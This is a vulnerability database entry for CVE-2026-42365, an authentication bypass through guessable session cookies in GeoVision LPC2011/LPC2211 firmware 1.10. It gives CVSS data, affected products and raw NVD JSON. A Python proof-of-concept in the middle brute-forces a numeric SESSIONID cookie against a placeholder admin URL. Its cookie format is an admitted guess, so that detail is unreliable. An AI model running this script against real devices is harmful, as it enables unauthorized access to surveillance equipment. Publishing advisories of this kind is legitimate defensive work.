Security Vulnerability Report
中文
CVE-2026-42365 CVSS 8.6 HIGH

CVE-2026-42365

Published: 2026-05-04 01:16:04
Last Modified: 2026-05-05 02:44:42
Source: 0df08a0e-a200-4957-9bb0-084f562506f9

Description

A guessable session cookie vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted series of HTTP requests can lead to an authentication bypas. An attacker can bruteforce session cookies to trigger this vulnerability.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:* - NOT VULNERABLE
GeoVision LPC2011/LPC2211 1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target-ip/admin/index.jsp" # Replace with actual target endpoint # Headers to mimic a legitimate browser request headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } print("[*] Starting brute force attack on session cookies...") # Simulating a brute force attack on a predictable 6-digit numeric session ID # The range and format should be adjusted based on actual reconnaissance for session_id in range(100000, 999999): cookies = { "SESSIONID": str(session_id) } try: response = requests.get(target_url, headers=headers, cookies=cookies, timeout=3) # Check if authentication was bypassed (e.g., HTTP 200 and presence of admin content) if response.status_code == 200 and "Dashboard" in response.text: print(f"[+] Success! Valid Cookie found: SESSIONID={session_id}") print(f"[+] Response length: {len(response.text)} bytes") break except requests.RequestException as e: # Handle connection errors silently or log them pass

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42365", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-04T01:16:03.620", "lastModified": "2026-05-05T02:44:42.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A guessable session cookie vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted series of HTTP requests can lead to an authentication bypas. An attacker can bruteforce session cookies to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-341"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2011_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "C1E349A9-4EEF-40B6-89A0-86242C2ADBC5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2011:-:*:*:*:*:*:*:*", "matchCriteriaId": "87CE78D0-0894-451F-9A70-4F2A8062EC8A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:geovision:gv-lpc2211_firmware:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "0F3B818E-22D3-400A-AF2C-DEA66280464A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:geovision:gv-lpc2211:-:*:*:*:*:*:*:*", "matchCriteriaId": "59F15521-B4F3-4CCA-8C03-0A4EA2864C6E"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Third Party Advisory"]}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Vendor Advisory"]}]}}